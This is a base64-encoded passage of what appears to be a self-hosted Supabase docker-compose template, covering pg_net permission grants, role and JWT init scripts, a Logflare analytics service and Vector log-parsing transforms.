dF9hZG1pbiByb2xlXG5ET1xuJCRcbkJFR0lOXG4gIElGIEVYSVNUUyAoXG4gICAgU0VMRUNUIDFcbiAgICBGUk9NIHBnX3JvbGVzXG4gICAgV0hFUkUgcm9sbmFtZSA9ICdzdXBhYmFzZV9wZ19uZXRfYWRtaW4nXG4gIClcbiAgVEhFTlxuICAgIFJFQVNTSUdOIE9XTkVEIEJZIHN1cGFiYXNlX3BnX25ldF9hZG1pbiBUTyBzdXBhYmFzZV9hZG1pbjtcbiAgICBEUk9QIE9XTkVEIEJZIHN1cGFiYXNlX3BnX25ldF9hZG1pbjtcbiAgICBEUk9QIFJPTEUgc3VwYWJhc2VfcGdfbmV0X2FkbWluO1xuICBFTkQgSUY7XG5FTkRcbiQkO1xuLS0gcGdfbmV0IGdyYW50cyB3aGVuIGV4dGVuc2lvbiBpcyBhbHJlYWR5IGVuYWJsZWRcbkRPXG4kJFxuQkVHSU5cbiAgSUYgRVhJU1RTIChcbiAgICBTRUxFQ1QgMVxuICAgIEZST00gcGdfZXh0ZW5zaW9uXG4gICAgV0hFUkUgZXh0bmFtZSA9ICdwZ19uZXQnXG4gIClcbiAgVEhFTlxuICAgIEdSQU5UIFVTQUdFIE9OIFNDSEVNQSBuZXQgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluLCBwb3N0Z3JlcywgYW5vbiwgYXV0aGVudGljYXRlZCwgc2VydmljZV9yb2xlO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBTRUNVUklUWSBERUZJTkVSO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VDVVJJVFkgREVGSU5FUjtcbiAgICBBTFRFUiBmdW5jdGlvbiBuZXQuaHR0cF9nZXQodXJsIHRleHQsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfZ2V0KHVybCB0ZXh0LCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIEZST00gUFVCTElDO1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfcG9zdCh1cmwgdGV4dCwgYm9keSBqc29uYiwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBGUk9NIFBVQkxJQztcbiAgICBHUkFOVCBFWEVDVVRFIE9OIEZVTkNUSU9OIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4sIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4gICAgR1JBTlQgRVhFQ1VURSBPTiBGVU5DVElPTiBuZXQuaHR0cF9wb3N0KHVybCB0ZXh0LCBib2R5IGpzb25iLCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiwgcG9zdGdyZXMsIGFub24sIGF1dGhlbnRpY2F0ZWQsIHNlcnZpY2Vfcm9sZTtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbi0tIEV2ZW50IHRyaWdnZXIgZm9yIHBnX25ldFxuQ1JFQVRFIE9SIFJFUExBQ0UgRlVOQ1RJT04gZXh0ZW5zaW9ucy5ncmFudF9wZ19uZXRfYWNjZXNzKClcblJFVFVSTlMgZXZlbnRfdHJpZ2dlclxuTEFOR1VBR0UgcGxwZ3NxbFxuQVMgJCRcbkJFR0lOXG4gIElGIEVYSVNUUyAoXG4gICAgU0VMRUNUIDFcbiAgICBGUk9NIHBnX2V2ZW50X3RyaWdnZXJfZGRsX2NvbW1hbmRzKCkgQVMgZXZcbiAgICBKT0lOIHBnX2V4dGVuc2lvbiBBUyBleHRcbiAgICBPTiBldi5vYmppZCA9IGV4dC5vaWRcbiAgICBXSEVSRSBleHQuZXh0bmFtZSA9ICdwZ19uZXQnXG4gIClcbiAgVEhFTlxuICAgIEdSQU5UIFVTQUdFIE9OIFNDSEVNQSBuZXQgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluLCBwb3N0Z3JlcywgYW5vbiwgYXV0aGVudGljYXRlZCwgc2VydmljZV9yb2xlO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBTRUNVUklUWSBERUZJTkVSO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VDVVJJVFkgREVGSU5FUjtcbiAgICBBTFRFUiBmdW5jdGlvbiBuZXQuaHR0cF9nZXQodXJsIHRleHQsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfZ2V0KHVybCB0ZXh0LCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIEZST00gUFVCTElDO1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfcG9zdCh1cmwgdGV4dCwgYm9keSBqc29uYiwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBGUk9NIFBVQkxJQztcbiAgICBHUkFOVCBFWEVDVVRFIE9OIEZVTkNUSU9OIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4sIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4gICAgR1JBTlQgRVhFQ1VURSBPTiBGVU5DVElPTiBuZXQuaHR0cF9wb3N0KHVybCB0ZXh0LCBib2R5IGpzb25iLCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiwgcG9zdGdyZXMsIGFub24sIGF1dGhlbnRpY2F0ZWQsIHNlcnZpY2Vfcm9sZTtcbiAgRU5EIElGO1xuRU5EO1xuJCQ7XG5DT01NRU5UIE9OIEZVTkNUSU9OIGV4dGVuc2lvbnMuZ3JhbnRfcGdfbmV0X2FjY2VzcyBJUyAnR3JhbnRzIGFjY2VzcyB0byBwZ19uZXQnO1xuRE9cbiQkXG5CRUdJTlxuICBJRiBOT1QgRVhJU1RTIChcbiAgICBTRUxFQ1QgMVxuICAgIEZST00gcGdfZXZlbnRfdHJpZ2dlclxuICAgIFdIRVJFIGV2dG5hbWUgPSAnaXNzdWVfcGdfbmV0X2FjY2VzcydcbiAgKSBUSEVOXG4gICAgQ1JFQVRFIEVWRU5UIFRSSUdHRVIgaXNzdWVfcGdfbmV0X2FjY2VzcyBPTiBkZGxfY29tbWFuZF9lbmQgV0hFTiBUQUcgSU4gKCdDUkVBVEUgRVhURU5TSU9OJylcbiAgICBFWEVDVVRFIFBST0NFRFVSRSBleHRlbnNpb25zLmdyYW50X3BnX25ldF9hY2Nlc3MoKTtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbklOU0VSVCBJTlRPIHN1cGFiYXNlX2Z1bmN0aW9ucy5taWdyYXRpb25zICh2ZXJzaW9uKSBWQUxVRVMgKCcyMDIxMDgwOTE4MzQyM191cGRhdGVfZ3JhbnRzJyk7XG5BTFRFUiBmdW5jdGlvbiBzdXBhYmFzZV9mdW5jdGlvbnMuaHR0cF9yZXF1ZXN0KCkgU0VDVVJJVFkgREVGSU5FUjtcbkFMVEVSIGZ1bmN0aW9uIHN1cGFiYXNlX2Z1bmN0aW9ucy5odHRwX3JlcXVlc3QoKSBTRVQgc2VhcmNoX3BhdGggPSBzdXBhYmFzZV9mdW5jdGlvbnM7XG5SRVZPS0UgQUxMIE9OIEZVTkNUSU9OIHN1cGFiYXNlX2Z1bmN0aW9ucy5odHRwX3JlcXVlc3QoKSBGUk9NIFBVQkxJQztcbkdSQU5UIEVYRUNVVEUgT04gRlVOQ1RJT04gc3VwYWJhc2VfZnVuY3Rpb25zLmh0dHBfcmVxdWVzdCgpIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5DT01NSVQ7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvcm9sZXMuc3FsCiAgICAgICAgdGFyZ2V0OiAvZG9ja2VyLWVudHJ5cG9pbnQtaW5pdGRiLmQvaW5pdC1zY3JpcHRzLzk5LXJvbGVzLnNxbAogICAgICAgIGNvbnRlbnQ6ICItLSBOT1RFOiBjaGFuZ2UgdG8geW91ciBvd24gcGFzc3dvcmRzIGZvciBwcm9kdWN0aW9uIGVudmlyb25tZW50c1xuIFxcc2V0IHBncGFzcyBgZWNobyBcIiRQT1NUR1JFU19QQVNTV09SRFwiYFxuXG4gQUxURVIgVVNFUiBhdXRoZW50aWNhdG9yIFdJVEggUEFTU1dPUkQgOidwZ3Bhc3MnO1xuIEFMVEVSIFVTRVIgcGdib3VuY2VyIFdJVEggUEFTU1dPUkQgOidwZ3Bhc3MnO1xuIEFMVEVSIFVTRVIgc3VwYWJhc2VfYXV0aF9hZG1pbiBXSVRIIFBBU1NXT1JEIDoncGdwYXNzJztcbiBBTFRFUiBVU0VSIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiBXSVRIIFBBU1NXT1JEIDoncGdwYXNzJztcbiBBTFRFUiBVU0VSIHN1cGFiYXNlX3N0b3JhZ2VfYWRtaW4gV0lUSCBQQVNTV09SRCA6J3BncGFzcyc7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvand0LnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL2luaXQtc2NyaXB0cy85OS1qd3Quc3FsCiAgICAgICAgY29udGVudDogIlxcc2V0IGp3dF9zZWNyZXQgYGVjaG8gXCIkSldUX1NFQ1JFVFwiYFxuXFxzZXQgand0X2V4cCBgZWNobyBcIiRKV1RfRVhQXCJgXG5cXHNldCBkYl9uYW1lIGBlY2hvIFwiJHtQT1NUR1JFU19EQjotcG9zdGdyZXN9XCJgXG5cbkFMVEVSIERBVEFCQVNFIDpkYl9uYW1lIFNFVCBcImFwcC5zZXR0aW5ncy5qd3Rfc2VjcmV0XCIgVE8gOidqd3Rfc2VjcmV0JztcbkFMVEVSIERBVEFCQVNFIDpkYl9uYW1lIFNFVCBcImFwcC5zZXR0aW5ncy5qd3RfZXhwXCIgVE8gOidqd3RfZXhwJztcbiIKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9kYi9sb2dzLnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL21pZ3JhdGlvbnMvOTktbG9ncy5zcWwKICAgICAgICBjb250ZW50OiAiXFxzZXQgcGd1c2VyIGBlY2hvIFwic3VwYWJhc2VfYWRtaW5cImBcblxcYyBfc3VwYWJhc2VcbmNyZWF0ZSBzY2hlbWEgaWYgbm90IGV4aXN0cyBfYW5hbHl0aWNzO1xuYWx0ZXIgc2NoZW1hIF9hbmFseXRpY3Mgb3duZXIgdG8gOnBndXNlcjtcblxcYyBwb3N0Z3Jlc1xuIgogICAgICAtICdzdXBhYmFzZS1kYi1jb25maWc6L2V0Yy9wb3N0Z3Jlc3FsLWN1c3RvbScKICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICBpbWFnZTogJ3N1cGFiYXNlL2xvZ2ZsYXJlOjEuNC4wJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjQwMDAvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBMT0dGTEFSRV9OT0RFX0hPU1Q9MTI3LjAuMC4xCiAgICAgIC0gREJfVVNFUk5BTUU9c3VwYWJhc2VfYWRtaW4KICAgICAgLSBEQl9EQVRBQkFTRT1fc3VwYWJhc2UKICAgICAgLSAnREJfSE9TVE5BTUU9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdEQl9QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ0RCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gREJfU0NIRU1BPV9hbmFseXRpY3MKICAgICAgLSAnTE9HRkxBUkVfQVBJX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfTE9HRkxBUkV9JwogICAgICAtIExPR0ZMQVJFX1NJTkdMRV9URU5BTlQ9dHJ1ZQogICAgICAtIExPR0ZMQVJFX1NJTkdMRV9URU5BTlRfTU9ERT10cnVlCiAgICAgIC0gTE9HRkxBUkVfU1VQQUJBU0VfTU9ERT10cnVlCiAgICAgIC0gTE9HRkxBUkVfTUlOX0NMVVNURVJfU0laRT0xCiAgICAgIC0gJ1BPU1RHUkVTX0JBQ0tFTkRfVVJMPXBvc3RncmVzcWw6Ly9zdXBhYmFzZV9hZG1pbjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9L19zdXBhYmFzZScKICAgICAgLSBQT1NUR1JFU19CQUNLRU5EX1NDSEVNQT1fYW5hbHl0aWNzCiAgICAgIC0gTE9HRkxBUkVfRkVBVFVSRV9GTEFHX09WRVJSSURFPW11bHRpYmFja2VuZD10cnVlCiAgc3VwYWJhc2UtdmVjdG9yOgogICAgaW1hZ2U6ICd0aW1iZXJpby92ZWN0b3I6MC4yOC4xLWFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1uby12ZXJib3NlJwogICAgICAgIC0gJy0tdHJpZXM9MScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vc3VwYWJhc2UtdmVjdG9yOjkwMDEvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgdm9sdW1lczoKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9sb2dzL3ZlY3Rvci55bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvdmVjdG9yL3ZlY3Rvci55bWwKICAgICAgICByZWFkX29ubHk6IHRydWUKICAgICAgICBjb250ZW50OiAiYXBpOlxuICBlbmFibGVkOiB0cnVlXG4gIGFkZHJlc3M6IDAuMC4wLjA6OTAwMVxuXG5zb3VyY2VzOlxuICBkb2NrZXJfaG9zdDpcbiAgICB0eXBlOiBkb2NrZXJfbG9nc1xuICAgIGV4Y2x1ZGVfY29udGFpbmVyczpcbiAgICAgIC0gc3VwYWJhc2UtdmVjdG9yXG5cbnRyYW5zZm9ybXM6XG4gIHByb2plY3RfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gZG9ja2VyX2hvc3RcbiAgICBzb3VyY2U6IHwtXG4gICAgICAucHJvamVjdCA9IFwiZGVmYXVsdFwiXG4gICAgICAuZXZlbnRfbWVzc2FnZSA9IGRlbCgubWVzc2FnZSlcbiAgICAgIC5hcHBuYW1lID0gZGVsKC5jb250YWluZXJfbmFtZSlcbiAgICAgIGRlbCguY29udGFpbmVyX2NyZWF0ZWRfYXQpXG4gICAgICBkZWwoLmNvbnRhaW5lcl9pZClcbiAgICAgIGRlbCguc291cmNlX3R5cGUpXG4gICAgICBkZWwoLnN0cmVhbSlcbiAgICAgIGRlbCgubGFiZWwpXG4gICAgICBkZWwoLmltYWdlKVxuICAgICAgZGVsKC5ob3N0KVxuICAgICAgZGVsKC5zdHJlYW0pXG4gIHJvdXRlcjpcbiAgICB0eXBlOiByb3V0ZVxuICAgIGlucHV0czpcbiAgICAgIC0gcHJvamVjdF9sb2dzXG4gICAgcm91dGU6XG4gICAgICBrb25nOiAnc3RhcnRzX3dpdGgoc3RyaW5nISguYXBwbmFtZSksIFwic3VwYWJhc2Uta29uZ1wiKSdcbiAgICAgIGF1dGg6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1hdXRoXCIpJ1xuICAgICAgcmVzdDogJ3N0YXJ0c193aXRoKHN0cmluZyEoLmFwcG5hbWUpLCBcInN1cGFiYXNlLXJlc3RcIiknXG4gICAgICByZWFsdGltZTogJ3N0YXJ0c193aXRoKHN0cmluZyEoLmFwcG5hbWUpLCBcInJlYWx0aW1lLWRldlwiKSdcbiAgICAgIHN0b3JhZ2U6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1zdG9yYWdlXCIpJ1xuICAgICAgZnVuY3Rpb25zOiAnc3RhcnRzX3dpdGgoc3RyaW5nISguYXBwbmFtZSksIFwic3VwYWJhc2UtZnVuY3Rpb25zXCIpJ1xuICAgICAgZGI6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1kYlwiKSdcbiAgIyBJZ25vcmVzIG5vbiBuZ2lueCBlcnJvcnMgc2luY2UgdGhleSBhcmUgcmVsYXRlZCB3aXRoIGtvbmcgYm9vdGluZyB1cFxuICBrb25nX2xvZ3M6XG4gICAgdHlwZTogcmVtYXBcbiAgICBpbnB1dHM6XG4gICAgICAtIHJvdXRlci5rb25nXG4gICAgc291cmNlOiB8LVxuICAgICAgcmVxLCBlcnIgPSBwYXJzZV9uZ2lueF9sb2coLmV2ZW50X21lc3NhZ2UsIFwiY29tYmluZWRcIilcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAudGltZXN0YW1wID0gcmVxLnRpbWVzdGFtcFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXF1ZXN0LmhlYWRlcnMucmVmZXJlciA9IHJlcS5yZWZlcmVyXG4gICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QuaGVhZGVycy51c2VyX2FnZW50ID0gcmVxLmFnZW50XG4gICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QuaGVhZGVycy5jZl9jb25uZWN0aW5nX2lwID0gcmVxLmNsaWVudFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXF1ZXN0Lm1ldGhvZCA9IHJlcS5tZXRob2RcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wYXRoID0gcmVxLnBhdGhcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wcm90b2NvbCA9IHJlcS5wcm90b2NvbFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXNwb25zZS5zdGF0dXNfY29kZSA9IHJlcS5zdGF0dXNcbiAgICAgIH1cbiAgICAgIGlmIGVyciAhPSBudWxsIHtcbiAgICAgICAgYWJvcnRcbiAgICAgIH1cbiAgIyBJZ25vcmVzIG5vbiBuZ2lueCBlcnJvcnMgc2luY2UgdGhleSBhcmUgcmVsYXRlZCB3aXRoIGtvbmcgYm9vdGluZyB1cFxuICBrb25nX2VycjpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmtvbmdcbiAgICBzb3VyY2U6IHwtXG4gICAgICAubWV0YWRhdGEucmVxdWVzdC5tZXRob2QgPSBcIkdFVFwiXG4gICAgICAubWV0YWRhdGEucmVzcG9uc2Uuc3RhdHVzX2NvZGUgPSAyMDBcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfbmdpbnhfbG9nKC5ldmVudF9tZXNzYWdlLCBcImVycm9yXCIpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLnRpbWVzdGFtcCA9IHBhcnNlZC50aW1lc3RhbXBcbiAgICAgICAgICAuc2V2ZXJpdHkgPSBwYXJzZWQuc2V2ZXJpdHlcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5ob3N0ID0gcGFyc2VkLmhvc3RcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5oZWFkZXJzLmNmX2Nvbm5lY3RpbmdfaXAgPSBwYXJzZWQuY2xpZW50XG4gICAgICAgICAgdXJsLCBlcnIgPSBzcGxpdChwYXJzZWQucmVxdWVzdCwgXCIgXCIpXG4gICAgICAgICAgaWYgZXJyID09IG51bGwge1xuICAgICAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5tZXRob2QgPSB1cmxbMF1cbiAgICAgICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QucGF0aCA9IHVybFsxXVxuICAgICAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wcm90b2NvbCA9IHVybFsyXVxuICAgICAgICAgIH1cbiAgICAgIH1cbiAgICAgIGlmIGVyciAhPSBudWxsIHtcbiAgICAgICAgYWJvcnRcbiAgICAgIH1cbiAgIyBHb3RydWUgbG9ncyBhcmUgc3RydWN0dXJlZCBqc29uIHN0cmluZ3Mgd2hpY2ggZnJvbnRlbmQgcGFyc2VzIGRpcmVjdGx5LiBCdXQgd2Uga2VlcCBtZXRhZGF0YSBmb3IgY29uc2lzdGVuY3kuXG4gIGF1dGhfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmF1dGhcbiAgICBzb3VyY2U6IHwtXG4gICAgICBwYXJzZWQsIGVyciA9IHBhcnNlX2pzb24oLmV2ZW50X21lc3NhZ2UpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLm1ldGFkYXRhLnRpbWVzdGFtcCA9IHBhcnNlZC50aW1lXG4gICAgICAgICAgLm1ldGFkYXRhID0gbWVyZ2UhKC5tZXRhZGF0YSwgcGFyc2VkKVxuICAgICAgfVxuICAjIFBvc3RnUkVTVCBsb2dzIGFyZSBzdHJ1Y3R1cmVkIHNvIHdlIHNlcGFyYXRlIHRpbWVzdGFtcCBmcm9tIG1lc3NhZ2UgdXNpbmcgcmVnZXhcbiAgcmVzdF9sb2dzOlxuICAgIHR5cGU6IHJlbWFwXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIucmVzdFxuICAgIHNvdXJjZTogfC1cbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInXig/UDx0aW1lPi4qKTogKD9QPG1zZz4uKikkJylcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAuZXZlbnRfbWVzc2FnZSA9IHBhcnNlZC5tc2dcbiAgICAgICAgICAudGltZXN0YW1wID0gdG9fdGltZXN0YW1wIShwYXJzZWQudGltZSlcbiAgICAgICAgICAubWV0YWRhdGEuaG9zdCA9IC5wcm9qZWN0XG4gICAgICB9XG4gICMgUmVhbHRpbWUgbG9ncyBhcmUgc3RydWN0dXJlZCBzbyB3ZSBwYXJzZSB0aGUgc2V2ZXJpdHkgbGV2ZWwgdXNpbmcgcmVnZXggKGlnbm9yZSB0aW1lIGJlY2F1c2UgaXQgaGFzIG5vIGRhdGUpXG4gIHJlYWx0aW1lX2xvZ3M6XG4gICAgdHlwZTogcmVtYXBcbiAgICBpbnB1dHM6XG4gICAgICAtIHJvdXRlci5yZWFsdGltZVxuICAgIHNvdXJjZTogfC1cbiAgICAgIC5tZXRhZGF0YS5wcm9qZWN0ID0gZGVsKC5wcm9qZWN0KVxuICAgICAgLm1ldGFkYXRhLmV4dGVybmFsX2lkID0gLm1ldGFkYXRhLnByb2plY3RcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInXig/UDx0aW1lPlxcZCs6XFxkKzpcXGQrXFwuXFxkKykgXFxbKD9QPGxldmVsPlxcdyspXFxdICg/UDxtc2c+LiopJCcpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLmV2ZW50X21lc3NhZ2UgPSBwYXJzZWQubXNnXG4gICAgICAgICAgLm1ldGFkYXRhLmxldmVsID0gcGFyc2VkLmxldmVsXG4gICAgICB9XG4gICMgU3RvcmFnZSBsb2dzIG1heSBjb250YWluIGpzb24gb2JqZWN0cyBzbyB3ZSBwYXJzZSB0aGVtIGZvciBjb21wbGV0ZW5lc3NcbiAgc3RvcmFnZV9sb2dzOlxuICAgIHR5cGU6IHJlbWFwXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIuc3RvcmFnZVxuICAgIHNvdXJjZTogfC1cbiAgICAgIC5tZXRhZGF0YS5wcm9qZWN0ID0gZGVsKC5wcm9qZWN0KVxuICAgICAgLm1ldGFkYXRhLnRlbmFudElkID0gLm1ldGFkYXRhLnByb2plY3RcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfanNvbiguZXZlbnRfbWVzc2FnZSlcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAuZXZlbnRfbWVzc2FnZSA9IHBhcnNlZC5tc2dcbiAgICAgICAgICAubWV0YWRhdGEubGV2ZWwgPSBwYXJzZWQubGV2ZWxcbiAgICAgICAgICAubWV0YWRhdGEudGltZXN0YW1wID0gcGFyc2VkLnRpbWVcbiAgICAgICAgICAubWV0YWRhdGEuY29udGV4dFswXS5ob3N0ID0gcGFyc2VkLmhvc3RuYW1lXG4gICAgICAgICAgLm1ldGFkYXRhLmNvbnRleHRbMF0ucGlkID0gcGFyc2VkLnBpZFxuICAgICAgfVxuICAjIFBvc3RncmVzIGxvZ3Mgc29tZSBtZXNzYWdlcyB0byBzdGRlcnIgd2hpY2ggd2UgbWFwIHRvIHdhcm5pbmcgc2V2ZXJpdHkgbGV2ZWxcbiAgZGJfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmRiXG4gICAgc291cmNlOiB8LVxuICAgICAgLm1ldGFkYXRhLmhvc3QgPSBcImRiLWRlZmF1bHRcIlxuICAgICAgLm1ldGFkYXRhLnBhcnNlZC50aW1lc3RhbXAgPSAudGltZXN0YW1wXG5cbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInLiooP1A8bGV2ZWw+SU5GT3xOT1RJQ0V8V0FSTklOR3xFUlJPUnxMT0d8RkFUQUx8UEFOSUM/KTouKicsIG51bWVyaWNfZ3JvdXBzOiB0cnVlKVxuXG4gICAgICBpZiBlcnIgIT0gbnVsbCB8fCBw